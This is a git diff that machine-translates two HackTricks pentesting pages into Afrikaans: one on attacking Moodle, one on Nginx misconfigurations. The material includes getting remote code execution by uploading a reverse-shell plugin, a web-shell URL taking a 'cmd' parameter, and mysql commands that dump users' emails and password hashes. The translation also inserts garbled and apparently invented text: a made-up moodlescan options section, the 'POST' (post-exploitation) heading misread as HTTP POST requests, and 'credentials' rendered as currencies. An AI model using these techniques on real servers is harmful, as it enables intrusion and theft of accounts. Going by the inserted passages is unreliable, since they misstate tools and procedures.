-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
 
 

 
 
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+As jy belangstel in 'n **hacking-loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
-## Automatic Scans
+## Outomatiese Skanderings
 
 ### droopescan
-
 ```bash
 pip3 install droopescan
 droopescan scan moodle -u http://moodle.example.com//
 
-[+] Plugins found:                                                              
-    forum http://moodle.schooled.htb/moodle/mod/forum/
-        http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
-        http://moodle.schooled.htb/moodle/mod/forum/version.php
+[+] Plugins found:
+forum http://moodle.schooled.htb/moodle/mod/forum/
+http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
+http://moodle.schooled.htb/moodle/mod/forum/version.php
 
 [+] No themes found.
 
 [+] Possible version(s):
-    3.10.0-beta
+3.10.0-beta
 
 [+] Possible interesting urls found:
-    Static readme file. - http://moodle.schooled.htb/moodle/README.txt
-    Admin panel - http://moodle.schooled.htb/moodle/login/
+Static readme file. - http://moodle.schooled.htb/moodle/README.txt
+Admin panel - http://moodle.schooled.htb/moodle/login/
 
 [+] Scan finished (0:00:05.643539 elapsed)
 ```
-
 ### moodlescan
 
+`moodlescan` is a tool used for scanning and enumerating Moodle instances. It helps in identifying vulnerabilities and misconfigurations in Moodle installations.
+
+#### Usage
+
+```
+moodlescan [OPTIONS] URL
+```
+
+#### Options
+
+- `-u, --username`: Specify a username for authentication.
+- `-p, --password`: Specify a password for authentication.
+- `-t, --threads`: Specify the number of threads to use for scanning.
+- `-o, --output`: Specify the output file to save the scan results.
+- `-v, --verbose`: Enable verbose mode for detailed output.
+
+#### Examples
+
+1. Perform a basic scan on a Moodle instance:
+
+```
+moodlescan https://example.com/moodle
+```
+
+2. Perform a scan with authentication:
+
+```
+moodlescan -u admin -p password123 https://example.com/moodle
+```
+
+3. Perform a scan with custom options:
+
+```
+moodlescan -t 10 -o scan_results.txt https://example.com/moodle
+```
+
+#### Notes
+
+- `moodlescan` uses various techniques to identify vulnerabilities, such as directory traversal, SQL injection, and cross-site scripting (XSS).
+- It is important to obtain proper authorization before scanning any Moodle instance.
+- The tool provides valuable information for penetration testers and security researchers to assess the security of Moodle installations.
 ```bash
 #Install from https://github.com/inc0d3/moodlescan
 python3 moodlescan.py -k -u http://moodle.example.com//
@@ -55,7 +94,7 @@ Version 0.7 - Dic/2020
 .............................................................................................................
 
 By Victor Herrera - supported by www.incode.cl
-	
+
 .............................................................................................................
 
 Getting server information http://moodle.schooled.htb/moodle/ ...
@@ -76,68 +115,95 @@ Vulnerabilities found: 0
 
 Scan completed.
 ```
-
 ### CMSMap
 
+CMSMap is 'n gereedskap wat gebruik kan word vir die identifisering van die inhoudsbestuurstelsel (CMS) wat deur 'n webwerf gebruik word. Dit kan ook gebruik word om kwesbaarhede in die CMS te identifiseer en te ondersoek. Hier is 'n paar van die kenmerke van CMSMap:
+
+- **Identifisering van CMS**: CMSMap kan gebruik word om die CMS wat deur 'n webwerf gebruik word, te identifiseer. Dit kan help om die spesifieke kenmerke en funksies van die CMS te bepaal.
+
+- **Kwesbaarheidstoetsing**: Die gereedskap kan gebruik word om potensiële kwesbaarhede in die CMS te identifiseer. Dit kan help om die veiligheid van die webwerf te verbeter deur die identifisering van moontlike aanvalsvektore.
+
+- **Plugin-identifikasie**: CMSMap kan ook gebruik word om die spesifieke plugins en uitbreidings wat deur die CMS gebruik word, te identifiseer. Dit kan nuttige inligting bied oor die funksionaliteit en moontlike kwesbaarhede van die webwerf.
+
+- **Versameling van inligting**: Die gereedskap kan gebruik word om verskillende tipes inligting oor die webwerf te versamel, soos die versie van die CMS, die tema wat gebruik word, en die geïnstalleerde plugins. Hierdie inligting kan nuttig wees vir verdere ondersoek en pentesting.
+
+CMSMap is 'n kragtige gereedskap wat deur pentesters en beveiligingskonsultante gebruik kan word om die veiligheid van webwerwe te ondersoek en te verbeter. Dit bied 'n nuttige manier om die CMS en die verwante kwesbaarhede te identifiseer, wat kan help om die risiko van aanvalle en datalekke te verminder.
 ```bash
 pip3 install git+https://github.com/dionach/CMSmap.git
 cmsmap http://moodle.example.com/
 ```
+### CVE's
 
-### CVEs
+Ek het gevind dat die outomatiese gereedskap baie nutteloos is om kwesbaarhede wat die moodle weergawe affekteer te vind. Jy kan dit nagaan by [https://snyk.io/vuln/composer:moodle%2Fmoodle](https://snyk.io/vuln/composer:moodle%2Fmoodle)
 
-I found that the automatic tools are pretty **useless finding vulnerabilities affecting the moodle version**. You can **check** for them in [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle)
+## RCE
 
-## **RCE**
-
-You need to have **manager** role and you **can install plugins** inside the **"Site administration"** tab\*\*:\*\*
+Jy moet 'n bestuurderrol hê en jy kan plugins installeer binne die "Site administration" tabblad:
 
 ![](<../../.gitbook/assets/image (447).png>)
 
-If you are manager you may still need to **activate this option**. You can see how ins the moodle privilege escalation PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321).
+As jy 'n bestuurder is, mag jy dalk steeds hierdie opsie moet aktiveer. Jy kan sien hoe in die moodle privilege escalatie PoC: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321).
 
-Then, you can **install the following plugin** that contains the classic pentest-monkey php r**ev shell** (_before uploading it you need to decompress it, change the IP and port of the revshell and crompress it again_)
+Dan kan jy die volgende plugin installeer wat die klassieke pentest-monkey php r**ev shell bevat (voordat jy dit oplaai, moet jy dit dekomprimeer, die IP en poort van die revshell verander en dit weer saamdruk)
 
 {% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}
 
-Or you could use the plugin from [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) to get a regular PHP shell with the "cmd" parameter.
-
-To access launch the malicious plugin you need to access to:
+Of jy kan die plugin van [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) gebruik om 'n gewone PHP shell met die "cmd" parameter te kry.
 
+Om toegang te verkry tot die kwaadwillige plugin, moet jy toegang verkry tot:
 ```bash
 http://domain.com//blocks/rce/lang/en/block_rce.php?cmd=id
 ```
-
 ## POST
 
-### Find database credentials
+### Vind databasisgeloofsbriewe
 
+Om databasisgeloofsbriewe in Moodle te vind, kan jy die volgende stappe volg:
+
+1. Identifiseer die POST-aanvrae wat deur die Moodle-toepassing gestuur word.
+2. Analiseer die POST-aanvrae om te kyk of enige databasisgeloofsbriewe ingesluit is.
+3. As jy databasisgeloofsbriewe in die POST-aanvrae vind, ontleed die inligting om die databasisbediener, gebruikersnaam en wagwoord te identifiseer.
+
+Dit kan gedoen word deur die volgende metodes te gebruik:
+
+- Inspekteer die netwerkverkeer met behulp van 'Burp Suite' of 'Wireshark' om die POST-aanvrae te onderskep.
+- Analiseer die inhoud van die POST-aanvrae om enige databasisgeloofsbriewe te identifiseer.
+- As die databasisgeloofsbriewe in die aanvrae versleutel is, probeer om die versleuteling te ontsyfer om die oorspronklike inligting te verkry.
+
+Dit is belangrik om te onthou dat die soek na databasisgeloofsbriewe sonder toestemming en wettige regte onwettig is. Slegs voer hierdie stappe uit as jy die nodige toestemming het om die Moodle-toepassing te toets.
 ```bash
 find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
 ```
+### Stort Geldeenhede uit databasis
 
-### Dump Credentials from database
+Om geldeenhede uit 'n databasis te stort, kan jy die volgende stappe volg:
 
+1. Identifiseer die databasis wat gebruik word deur die toepassing.
+2. Verkry toegang tot die databasis deur gebruik te maak van SQL-injeksie, 'n onveilige konfigurasie of 'n ander aanvalstegniek.
+3. Identifiseer die tabel wat die geldeenhede bevat.
+4. Voer 'n SQL-aanvraag uit om die geldeenhede uit die tabel te stort.
+5. Stoor die gestorte geldeenhede in 'n lêer of 'n ander vorm van datastoorplek.
+
+Dit is belangrik om te onthou dat die stort van geldeenhede uit 'n databasis onwettig is sonder die toestemming van die eienaar van die databasis. Hierdie tegniek word slegs beskryf vir doeleindes van pentesting en om bewus te wees van moontlike beveiligingslekke.
 ```bash
 /usr/local/bin/mysql -u  --password= -e "use moodle; select email,username,password from mdl_user; exit"
 ```
-
 
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+As jy belangstel in 'n **hacker loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vlot Pools skriftelik en mondeling vereis_).
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/network-services-pentesting/pentesting-web/nginx.md b/network-services-pentesting/pentesting-web/nginx.md
index 7a8a579f2..dc957b59d 100644
--- a/network-services-pentesting/pentesting-web/nginx.md
+++ b/network-services-pentesting/pentesting-web/nginx.md
@@ -2,69 +2,62 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
 

 
-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige pentest uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie pentesters nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle 'n bietjie tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
-## Missing root location 
+## Ontbrekende hooflokasie 
 
-## **Essentials of Configuring Nginx Root Directory**
-
-When configuring the Nginx server, the **root directive** plays a critical role by defining the base directory from which files are served. Consider the example below:
+## **Essensiële beginsels van die konfigurasie van die Nginx-hoofgids**
 
+Wanneer die Nginx-bediener gekonfigureer word, speel die **root-aanwysing** 'n kritieke rol deur die basisgids te definieer waarvandaan lêers bedien word. Oorweeg die volgende voorbeeld:
 ```bash
 server {
-        root /etc/nginx;
+root /etc/nginx;
 
-        location /hello.txt {
-                try_files $uri $uri/ =404;
-                proxy_pass http://127.0.0.1:8080/;
-        }
+location /hello.txt {
+try_files $uri $uri/ =404;
+proxy_pass http://127.0.0.1:8080/;
+}
 }
 ```
+In hierdie konfigurasie word `/etc/nginx` as die hoofgids aangewys. Hierdie opset maak toegang tot lêers binne die gespesifiseerde hoofgids moontlik, soos `/hello.txt`. Dit is egter belangrik om op te let dat slegs 'n spesifieke ligging (`/hello.txt`) gedefinieer is. Daar is geen konfigurasie vir die hoofligging (`location / {...}`) nie. Hierdie weglatings beteken dat die hoofopdrag globaal van toepassing is, wat beteken dat versoek na die hoofpad `/` toegang tot lêers onder `/etc/nginx` kan verkry.
 
-In this configuration, `/etc/nginx` is designated as the root directory. This setup allows access to files within the specified root directory, such as `/hello.txt`. However, it's crucial to note that only a specific location (`/hello.txt`) is defined. There's no configuration for the root location (`location / {...}`). This omission means that the root directive applies globally, enabling requests to the root path `/` to access files under `/etc/nginx`.
+'n Kritieke veiligheidsoorweging ontstaan as gevolg van hierdie konfigurasie. 'n Eenvoudige `GET` versoek, soos `GET /nginx.conf`, kan sensitiewe inligting blootstel deur die Nginx konfigurasie-lêer wat by `/etc/nginx/nginx.conf` geleë is, te bedien. Deur die hoofgids na 'n minder sensitiewe gids, soos `/etc`, te stel, kan hierdie risiko verminder word, maar dit kan steeds onbedoelde toegang tot ander kritieke lêers moontlik maak, insluitend ander konfigurasie-lêers, toegangsjoernale en selfs versleutelde geloofsbriewe wat gebruik word vir HTTP basiese outentifikasie.
 
-A critical security consideration arises from this configuration. A simple `GET` request, like `GET /nginx.conf`, could expose sensitive information by serving the Nginx configuration file located at `/etc/nginx/nginx.conf`. Setting the root to a less sensitive directory, like `/etc`, could mitigate this risk, yet it still may allow unintended access to other critical files, including other configuration files, access logs, and even encrypted credentials used for HTTP basic authentication.
-
-## Alias LFI Misconfiguration 
-
-In the configuration files of Nginx, a close inspection is warranted for the "location" directives. A vulnerability known as Local File Inclusion (LFI) can be inadvertently introduced through a configuration that resembles the following:
+## Alias LFI Misconfiguratie 
 
+In die konfigurasie lêers van Nginx is 'n noukeurige ondersoek van die "ligging" opdragte nodig. 'n Kwesbaarheid wat bekend staan as Plaaslike Lêer Insluiting (LFI) kan onbedoeld deur 'n konfigurasie soos die volgende ingevoer word:
 ```
-location /imgs { 
-    alias /path/images/;
+location /imgs {
+alias /path/images/;
 }
 ```
+Hierdie konfigurasie is vatbaar vir LFI-aanvalle as gevolg van die bedieners wat versoek soos `/imgs../flag.txt` interpreteer as 'n poging om lêers buite die bedoelde gids te benader, wat effektief oplos na `/path/images/../flag.txt`. Hierdie fout stel aanvallers in staat om lêers van die bediener se lêersisteem te herwin wat nie toeganklik behoort te wees via die web nie.
 
-This configuration is prone to LFI attacks due to the server interpreting requests like `/imgs../flag.txt` as an attempt to access files outside the intended directory, effectively resolving to `/path/images/../flag.txt`. This flaw allows attackers to retrieve files from the server's filesystem that should not be accessible via the web.
-
-To mitigate this vulnerability, the configuration should be adjusted to:
-
+Om hierdie kwesbaarheid te verminder, moet die konfigurasie aangepas word na:
 ```
-location /imgs/ { 
-    alias /path/images/;
+location /imgs/ {
+alias /path/images/;
 }
 ```
+Meer inligting: [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)
 
-More info: [https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/](https://www.acunetix.com/vulnerabilities/web/path-traversal-via-misconfigured-nginx-alias/)
-
-Accunetix tests:
-
+Accunetix toetse:
 ```
 alias../ => HTTP status code 403
 alias.../ => HTTP status code 404
@@ -72,37 +65,27 @@ alias../../ => HTTP status code 403
 alias../../../../../../../../../../../ => HTTP status code 400
 alias../ => HTTP status code 403
 ```
+## Onveilige padbeperking 
 
-## Unsafe path restriction 
-
-Check the following page to learn how to bypass directives like:
-
+Kyk na die volgende bladsy om te leer hoe om riglyne soos die volgende te omseil:
 ```plaintext
 location = /admin {
-    deny all;
+deny all;
 }
 
 location = /admin/ {
-    deny all;
+deny all;
 }
 ```
+## Onveilige gebruik van veranderlikes 
 
-{% content-ref url="../../pentesting-web/proxy-waf-protections-bypass.md" %}
-[proxy-waf-protections-bypass.md](../../pentesting-web/proxy-waf-protections-bypass.md)
-{% endcontent-ref %}
-
-## Unsafe variable use 
-
-A vulnerability in Nginx configuration is demonstrated by the example below:
-
+'n Kwesbaarheid in die Nginx-konfigurasie word gedemonstreer deur die volgende voorbeeld:
 ```
 location / {
-  return 302 https://example.com$uri;
+return 302 https://example.com$uri;
 }
 ```
-
-The characters \r (Carriage Return) and \n (Line Feed) signify new line characters in HTTP requests, and their URL-encoded forms are represented as `%0d%0a`. Including these characters in a request (e.g., `http://localhost/%0d%0aDetectify:%20clrf`) to a misconfigured server results in the server issuing a new header named `Detectify`. This happens because the $uri variable decodes the URL-encoded new line characters, leading to an unexpected header in the response:
-
+Die karakters \r (Carriage Return) en \n (Line Feed) dui nuwe lyn karakters aan in HTTP-versoeke, en hul URL-gekodeerde vorms word voorgestel as `%0d%0a`. Deur hierdie karakters in 'n versoek in te sluit (bv. `http://localhost/%0d%0aDetectify:%20clrf`) na 'n verkeerd gekonfigureerde bediener, sal die bediener 'n nuwe kop met die naam `Detectify` uitreik. Dit gebeur omdat die $uri-veranderlike die URL-gekodeerde nuwe lyn karakters ontkodeer, wat lei tot 'n onverwagte kop in die respons:
 ```
 HTTP/1.1 302 Moved Temporarily
 Server: nginx/1.19.3
@@ -112,146 +95,132 @@ Connection: keep-alive
 Location: https://example.com/
 Detectify: clrf
 ```
+Leer meer oor die risiko's van CRLF-injeksie en responsplitsing by [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/).
 
-Learn more about the risks of CRLF injection and response splitting at [https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/](https://blog.detectify.com/2019/06/14/http-response-splitting-exploitations-and-mitigations/).
+### Enige veranderlike
 
-### Any variable
-
-It was discovered that **user-supplied data** might be treated as an **Nginx variable** under certain circumstances. The cause of this behavior remains somewhat elusive, yet it's not rare nor straightforward to verify. This anomaly was highlighted in a security report on HackerOne, which can be viewed [here](https://hackerone.com/reports/370094). Further investigation into the error message led to the identification of its occurrence within the [SSI filter module of Nginx's codebase](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365), pinpointing Server Side Includes (SSI) as the root cause.
-
-To **detect this misconfiguration**, the following command can be executed, which involves setting a referer header to test for variable printing:
+Daar is ontdek dat **gebruikersverskafte data** as 'n **Nginx-veranderlike** behandel kan word onder sekere omstandighede. Die oorsaak van hierdie gedrag bly ietwat raaiselagtig, maar dit is nie selde of maklik om te verifieer nie. Hierdie anomalie is uitgelig in 'n veiligheidsverslag op HackerOne, wat hier besigtig kan word [hier](https://hackerone.com/reports/370094). Verdere ondersoek na die foutboodskap het gelei tot die identifikasie van sy voorkoms binne die [SSI-filtermodule van Nginx se kodebasis](https://github.com/nginx/nginx/blob/2187586207e1465d289ae64cedc829719a048a39/src/http/modules/ngx_http_ssi_filter_module.c#L365), wat Server Side Includes (SSI) as die hoofoor-saak aanwys.
 
+Om hierdie verkeerde konfigurasie op te spoor, kan die volgende opdrag uitgevoer word, wat die instelling van 'n verwysingskop behels om vir veranderlike druk te toets:
 ```bash
 $ curl -H ‘Referer: bar’ http://localhost/foo$http_referer | grep ‘foobar’
 ```
+Skanderings vir hierdie verkeerde konfigurasie oor stelsels het verskeie gevalle aan die lig gebring waar Nginx-veranderlikes deur 'n gebruiker gedruk kon word. Nietemin, 'n afname in die aantal kwesbare gevalle dui daarop dat pogings om hierdie probleem reg te stel, enigsins suksesvol was.
 
-Scans for this misconfiguration across systems revealed multiple instances where Nginx variables could be printed by a user. However, a decrease in the number of vulnerable instances suggests that efforts to patch this issue have been somewhat successful.
+## Lewerings van onbewerkte agterste antwoorde
 
-## Raw backend response reading
-
-
-Nginx offers a feature through `proxy_pass` that allows for the interception of errors and HTTP headers produced by the backend, aiming to hide internal error messages and headers. This is accomplished by Nginx serving custom error pages in response to backend errors. However, challenges arise when Nginx encounters an invalid HTTP request. Such a request gets forwarded to the backend as received, and the backend's raw response is then directly sent to the client without Nginx's intervention.
-
-Consider an example scenario involving a uWSGI application:
+Nginx bied 'n funksie deur middel van `proxy_pass` wat die onderskepping van foute en HTTP-koppele wat deur die agterste vervaardig word, moontlik maak, met die doel om interne foutboodskappe en koppele te verberg. Dit word bereik deur Nginx aangepaste foutbladsye as antwoord op agterste foute te bedien. Tog ontstaan uitdagings wanneer Nginx 'n ongeldige HTTP-versoek teëkom. So 'n versoek word soos ontvang na die agterste deurgestuur, en die agterste se onbewerkte antwoord word dan direk na die kliënt gestuur sonder Nginx se tussenkoms.
 
+Oorweeg 'n voorbeeldscenario met 'n uWSGI-toepassing:
 ```python
 def application(environ, start_response):
-    start_response('500 Error', [('Content-Type', 'text/html'), ('Secret-Header', 'secret-info')])
-    return [b"Secret info, should not be visible!"]
+start_response('500 Error', [('Content-Type', 'text/html'), ('Secret-Header', 'secret-info')])
+return [b"Secret info, should not be visible!"]
 ```
-
-To manage this, specific directives in the Nginx configuration are used:
-
+Om dit te bestuur, word spesifieke riglyne in die Nginx-konfigurasie gebruik:
 ```
 http {
-    error_page 500 /html/error.html;
-    proxy_intercept_errors on;
-    proxy_hide_header Secret-Header;
+error_page 500 /html/error.html;
+proxy_intercept_errors on;
+proxy_hide_header Secret-Header;
 }
 ```
+- **[proxy_intercept_errors](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_intercept_errors)**: Hierdie riglyn stel Nginx in staat om 'n aangepaste reaksie te dien vir agterkant reaksies met 'n statuskode groter as 300. Dit verseker dat, vir ons voorbeeld uWSGI-toepassing, 'n `500 Fout` reaksie onderskep en hanteer word deur Nginx.
+- **[proxy_hide_header](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_hide_header)**: Soos die naam aandui, verberg hierdie riglyn gespesifiseerde HTTP-koppe van die kliënt, wat privaatheid en veiligheid verbeter.
 
-- **[proxy_intercept_errors](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_intercept_errors)**: This directive enables Nginx to serve a custom response for backend responses with a status code greater than 300. It ensures that, for our example uWSGI application, a `500 Error` response is intercepted and handled by Nginx.
-- **[proxy_hide_header](http://nginx.org/en/docs/http/ngx_http_proxy_module.html#proxy_hide_header)**: As the name suggests, this directive hides specified HTTP headers from the client, enhancing privacy and security.
-
-When a valid `GET` request is made, Nginx processes it normally, returning a standard error response without revealing any secret headers. However, an invalid HTTP request bypasses this mechanism, resulting in the exposure of raw backend responses, including secret headers and error messages.
+Wanneer 'n geldige `GET` versoek gemaak word, verwerk Nginx dit normaalweg en gee 'n standaard fout reaksie sonder om enige geheime koppe te onthul. 'n Ongeldige HTTP versoek omseil egter hierdie meganisme, wat lei tot die blootstelling van rou agterkant reaksies, insluitend geheime koppe en foutboodskappe.
 
 
-## merge\_slashes set to off
+## merge\_slashes gestel op off
 
-By default, Nginx's **`merge_slashes` directive** is set to **`on`**, which compresses multiple forward slashes in a URL into a single slash. This feature, while streamlining URL processing, can inadvertently conceal vulnerabilities in applications behind Nginx, particularly those prone to local file inclusion (LFI) attacks. Security experts **Danny Robinson and Rotem Bar** have highlighted the potential risks associated with this default behavior, especially when Nginx acts as a reverse-proxy.
+Standaard is Nginx se **`merge_slashes` riglyn** gestel op **`on`**, wat meervoudige vorentoe slasies in 'n URL saamdruk tot 'n enkele slasie. Hierdie funksie, terwyl dit URL-verwerking stroomlyn, kan onbedoeld kwesbaarhede in toepassings agter Nginx verberg, veral dié wat vatbaar is vir plaaslike lêer insluiting (LFI) aanvalle. Sekuriteitsexperts **Danny Robinson en Rotem Bar** het die potensiële risiko's wat verband hou met hierdie verstekgedrag beklemtoon, veral wanneer Nginx as 'n omgekeerde proksi optree.
 
-To mitigate such risks, it is recommended to **turn the `merge_slashes` directive off** for applications susceptible to these vulnerabilities. This ensures that Nginx forwards requests to the application without altering the URL structure, thereby not masking any underlying security issues.
+Om sulke risiko's te verminder, word dit aanbeveel om die `merge_slashes` riglyn af te skakel vir toepassings wat vatbaar is vir hierdie kwesbaarhede. Dit verseker dat Nginx versoek na die toepassing stuur sonder om die URL-struktuur te verander, en dus nie enige onderliggende veiligheidsprobleme verberg nie.
 
-For more information check [Danny Robinson and Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
+Vir meer inligting, kyk na [Danny Robinson en Rotem Bar](https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d).
 
-### **Default Value in Map Directive**
-
-In the **Nginx configuration**, the `map` directive often plays a role in **authorization control**. A common mistake is not specifying a **default** value, which could lead to unauthorized access. For instance:
+### **Verstekwaarde in Map Riglyn**
 
+In die **Nginx-konfigurasie** speel die `map` riglyn dikwels 'n rol in **toestemmingsbeheer**. 'n Algemene fout is om nie 'n **verstek** waarde te spesifiseer nie, wat kan lei tot ongemagtigde toegang. Byvoorbeeld:
 ```yaml
 http {
-    map $uri $mappocallow {
-        /map-poc/private 0;
-        /map-poc/secret 0;
-        /map-poc/public 1;
-    }
+map $uri $mappocallow {
+/map-poc/private 0;
+/map-poc/secret 0;
+/map-poc/public 1;
+}
 }
 ```
 
 ```yaml
 server {
-    location /map-poc {
-        if ($mappocallow = 0) {return 403;}
-        return 200 "Hello. It is private area: $mappocallow";
-    }
+location /map-poc {
+if ($mappocallow = 0) {return 403;}
+return 200 "Hello. It is private area: $mappocallow";
+}
 }
 ```
+Sonder 'n `default`, kan 'n **booswillige gebruiker** sekuriteit omseil deur toegang te verkry tot 'n **ongedefinieerde URI** binne `/map-poc`. [Die Nginx-handleiding](https://nginx.org/en/docs/http/ngx_http_map_module.html) beveel aan dat 'n **verstekwaarde** ingestel word om sulke probleme te voorkom.
 
-Without a `default`, a **malicious user** can bypass security by accessing an **undefined URI** within `/map-poc`. [The Nginx manual](https://nginx.org/en/docs/http/ngx_http_map_module.html) advises setting a **default value** to avoid such issues.
-
-### **DNS Spoofing Vulnerability**
-
